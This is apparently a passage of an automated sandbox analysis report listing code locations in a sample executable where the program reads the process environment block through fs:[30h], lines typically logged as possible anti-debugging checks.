Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_0099B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_0099B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_0099C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009CD294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009CD294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009AAAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009AAAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009CFAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A54AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A54AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A54AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A54AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A54AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A54AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A54AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A54AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A54AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A54AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A54AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A54AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A54AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A54AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009C2ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009C2AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009B3A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00995210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00995210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00995210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00995210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_0099AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_0099AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009A8A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009D4A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009D4A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A5AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A5AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A4B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A4B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A68A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00999240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00999240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00999240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00999240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009D927A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A5EA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A24257 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A65BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009C2397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009CB390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009A1B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009A1B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A4D380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A5138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009C4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009C4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009C4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A423E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A423E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A423E3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A153CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A153CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BDBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009C03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009C03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009C03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009C03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009C03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009C03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009BA309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A5131B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_0099F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_0099DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009C3B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009C3B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_0099DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A68B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_009A849B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A54496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A54496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A54496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe Code function: 1_2_00A54496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A16CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A16CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A16CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A514FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A68CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A6740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A6740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A6740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A16C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A16C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A16C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A16C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A2C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A2C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009B746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A605AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A605AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00992D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00992D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00992D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00992D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00992D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A52D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A52D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A52D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A52D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A52D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A52D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A52D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A5FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A5FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A5FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A5FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A48DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A16DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A16DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A16DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A16DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A16DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A16DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009AD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009AD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A68D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A1A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A5E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_0099AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009B7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A13540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A43D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A60EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A60EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A60EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A146A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A2FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A4FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A68ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_0099C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_0099C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_0099C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A4FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A51608 mov eax, dword ptr fs:[00000030h]
